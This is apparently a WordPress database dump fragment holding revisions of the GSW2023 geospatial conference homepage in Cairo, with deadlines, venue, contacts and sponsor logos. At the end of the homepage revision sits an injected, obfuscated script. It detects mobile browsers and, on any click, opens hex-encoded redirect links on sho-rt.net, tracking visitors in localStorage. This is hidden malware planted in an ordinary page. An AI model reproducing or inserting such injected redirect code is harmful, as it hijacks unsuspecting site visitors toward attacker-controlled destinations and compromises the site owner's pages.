!important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-24 23:11:29','2023-05-24 23:11:29','',3066,'https://gsw2023.com/?p=4564',0,'revision','',0),
(4565,1,'2023-05-24 23:12:26','2023-05-24 23:12:26','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" 